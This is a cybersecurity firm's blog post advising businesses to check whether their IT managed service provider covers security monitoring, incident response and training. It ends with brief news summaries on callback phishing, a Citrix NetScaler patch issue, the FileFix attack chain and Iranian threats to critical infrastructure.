#NSBCS.081 - Is Your IT Provider Really Protecting Your Business? A Cybersecurity Reality Check

Cyber Offensive Security
Written By Shane Bell
Is Your IT Provider Really Protecting Your Business? A Cybersecurity Reality Check

Source: NSB Cyber

 

Is Your IT Provider Really Protecting Your Business?

Your business depends on technology, but here's an uncomfortable truth: not all IT Managed Service Providers (MSPs) are equipped to handle today's cybersecurity threats. Many excel at keeping your computers running and your email flowing, but struggle when it comes to comprehensive cyber protection.

Most businesses assume their IT provider has cybersecurity covered. After all, they're the technology experts, right? Unfortunately, many traditional IT MSPs focus primarily on:

  • Manage subscriptions and enabling operational technologies;

  • Hardware maintenance and repairs;

  • Software updates and patches;

  • Network connectivity issues; and

  • Antivirus installation.

What they can often miss are the sophisticated, multi-layered security strategies that modern cyber threats require. A truly cyber-ready MSP should provide:

  • Comprehensive Protection Strategy: Your MSP should implement multiple layers of security, including endpoint protection, identity protection, email security, network monitoring, logging and backup solutions. They should also conduct regular vulnerability assessments and penetration testing.

  • 24/7 Security Operations: Cyber threats don't follow business hours. Your MSP should have round-the-clock monitoring capabilities, either in-house or through a trusted Managed Security Service Provider (MSSP) that operates a Security Operations Center (SOC).

  • Incident Response: Not if, but when a security incident occurs, your MSP should have a tested, documented response plan. They should be able to contain threats quickly, minimise damage, and restore operations with minimal downtime.

  • Regular Security Education: Your MSP should provide ongoing cybersecurity awareness training for your team but also maintain excellent security awareness for themselves.

If an MSP lacks these capabilities, it’s not a dealbreaker — they can partner with specialised MSSPs to fill gaps. The key is transparency and a clear plan to address your cybersecurity needs. Here are some actionable steps to consider with your MSP:

  • Request a Cybersecurity Roadmap: Ask your current or prospective MSP for a detailed cybersecurity roadmap, including specific tools (e.g., SIEM, EDR), processes (e.g., patch management), and incident response strategy.

  • Verify MSSP Partnerships: If the MSP relies on an MSSP, request details about the partner’s credentials, SOC capabilities, and service-level agreements (SLAs) to ensure robust coverage.

  • Conduct a Security Audit: Engage a third-party cybersecurity firm to assess your current MSP’s setup and identify gaps in protection, monitoring, or response capabilities.

  • Review Training Programs: Confirm the MSP offers regular, tailored cybersecurity training for your team, including phishing simulations and best practices for secure remote work.

  • Test Incident Response: Ask the MSP to walk you through a recent incident response case study or conduct a tabletop exercise to demonstrate their preparedness.

By prioritising a cyber-ready MSP or supplementing with specialised providers, you can safeguard your business against evolving threats. Start with these actionable steps to ensure your technology partner aligns with Australia’s cybersecurity standards and take #NoStepsBackwards.

Strengthen your defences. Explore NSB Cyber’s Foundational Managed Services or schedule a quick call with us.

What we read this week

  • Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns - Cybersecurity experts warn that a large number of phishing emails with PDF attachments trick victims into calling phone numbers controlled by attackers, a tactic known as Telephone Oriented Attack Delivery (TOAD) or callback phishing. Between May 5 and June 5, 2025, analysis showed Microsoft and DocuSign were the most impersonated brands in these TOAD emails, with NortonLifeLock, PayPal, and Geek Squad also frequently used to deceive victims. Additionally, threat actors are exploiting Microsoft 365’s Direct Send feature to send phishing emails from spoofed internal addresses, abusing artificial intelligence (AI) tools to steer users to malicious sites, and injecting code into compromised legitimate domains to manipulate search results in favour of phishing pages, undermining brand integrity and user trust.

  • Citrix Warns of Login Issues after NetScaler Auth Bypass Patch - Citrix has warned that applying recent patches for critical vulnerabilities on NetScaler ADC and Gateway appliances might cause login pages to break, particularly when certain authentication methods are used. This issue stems from a new default setting that enables the Content Security Policy (CSP) header, designed to block malicious scripts but which can also interfere with legitimate scripts in custom identity provider (IDP) configurations. The critical vulnerabilities being patched include one (CVE-2025-5777, or Citrix Bleed 2) that allows attackers to hijack user sessions, and another (CVE-2025-6543) that is exploited in denial-of-service attacks. Citrix advises administrators to temporarily disable the CSP header and clear the cache to restore normal login functionality.

  • FileFix Attack Chain Enables Malicious Script Execution - A security researcher has identified a new attack chain, called FileFix, that lets attackers execute malicious scripts on Windows systems while bypassing the Mark of the Web (MoTW) protection. The attack builds on the ClickFix technique, which tricks users into copying and running malicious commands by presenting fake errors and reCAPTCHA challenges on compromised websites, a tactic previously seen infecting thousands of WordPress sites. The security researcher demonstrated how attackers use phishing pages to convince victims to copy a malicious PowerShell command and paste it into Windows, or save an HTML page renamed as a .HTA file, which executes harmful scripts automatically via mshta.exe without triggering security warnings. This works because HTML files saved as “Webpage, Complete” don’t carry the MoTW tag, letting scripts run unhindered. To protect against these attacks, users should disable or remove mshta.exe, enable file extension visibility, block HTML attachments in emails, and stay cautious of unsolicited messages.

  • The United States Warns of Iranian Cyber Threats on Critical Infrastructure - United States (U.S.) cyber agencies have issued a warning about potential cyberattacks by Iranian-linked hackers against critical infrastructure, particularly in light of ongoing Middle East tensions. While there is no current evidence of active attacks, organisations in sectors like energy, water, healthcare, and especially those in the Defense Industrial Base with Israeli ties, are urged to stay vigilant. Iranian threat actors have previously exploited unpatched vulnerabilities and default passwords, as seen in the November 2023 breach of a Pennsylvania water facility. These actors also engage in distributed-denial-of-service (DDoS) attacks, website defacements, and ransomware campaigns. Authorities recommend isolating critical systems from the internet, using strong passwords with multi-factor authentication (MFA) and promptly applying software updates, and monitoring for suspicious activity.

References
https://thehackernews.com/2025/07/hackers-using-pdfs-to-impersonate.html
https://www.bleepingcomputer.com/news/security/citrix-warns-of-login-issues-after-netscaler-auth-bypass-patch/
https://www.darkreading.com/threat-intelligence/filefix-attack-chain-malicious-script
https://www.bleepingcomputer.com/news/security/us-warns-of-iranian-cyber-threats-on-critical-infrastructure/
Shane Bell
Next

#NSBCS.080 - Why might I need a ‘pentest’? Tips for a non-cybersecurity buyer